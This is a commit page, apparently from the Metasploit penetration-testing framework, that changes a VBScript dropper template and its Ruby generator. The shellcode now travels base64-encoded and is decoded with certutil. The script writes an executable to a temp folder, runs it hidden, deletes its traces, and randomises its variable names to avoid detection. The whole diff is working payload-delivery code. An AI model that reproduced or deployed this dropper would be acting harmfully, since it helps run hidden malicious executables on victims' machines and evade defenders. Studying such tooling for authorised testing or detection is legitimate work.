Skip to content

Commit c8c5549

Browse files
f7b053223a9ef7b053223a9e
committed
Send base64ed shellcode and decode with certutil
1 parent 53ff305 commit c8c5549

File tree

2 files changed

+12
-9
lines changed

2 files changed

+12
-9
lines changed

data/templates/scripts/to_exe.vbs.template

Lines changed: 9 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -1,26 +1,27 @@
11
Function %{var_func}()
2-
%{var_shellcode} = "%{hex_shellcode}"
2+
%{var_shellcode} = "%{base64_shellcode}"
33

44
Dim %{var_obj}
55
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
66
Dim %{var_stream}
77
Dim %{var_tempdir}
8-
Dim %{var_tempexe}
8+
Dim %{var_tempbase64}
99
Dim %{var_basedir}
1010
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
1111
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
1212
%{var_obj}.CreateFolder(%{var_basedir})
13+
%{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
1314
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
14-
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
15-
For i = 1 to Len(%{var_shellcode}) Step 2
16-
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
17-
Next
15+
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
16+
%{var_stream}.Write %{var_shellcode}
1817
%{var_stream}.Close
1918
Dim %{var_shell}
2019
Set %{var_shell} = CreateObject("Wscript.Shell")
20+
%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
2121
%{var_shell}.run %{var_tempexe}, 0, true
22-
%{var_obj}.DeleteFile(%{var_tempexe})
22+
%{var_obj}.DeleteFile(%{var_tempexe})
23+
%{var_obj}.DeleteFile(%{var_tempbase64})
2324
%{var_obj}.DeleteFolder(%{var_basedir})
2425
End Function
2526

26-
%{init}
27+
%{init}

lib/msf/util/exe.rb

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1243,6 +1243,7 @@ def self.to_exe_vbs(exes = '', opts = {})
12431243

12441244
hash_sub = {}
12451245
hash_sub[:exe_filename] = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
1246+
hash_sub[:base64_filename] = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'
12461247
hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
12471248
hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
12481249
hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -1251,9 +1252,10 @@ def self.to_exe_vbs(exes = '', opts = {})
12511252
hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8)
12521253
hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
12531254
hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
1255+
hash_sub[:var_tempbase64] = Rex::Text.rand_text_alpha(rand(8)+8)
12541256
hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
12551257

1256-
hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
1258+
hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
12571259

12581260
hash_sub[:init] = ""
12591261

0 commit comments

Comments
 (0)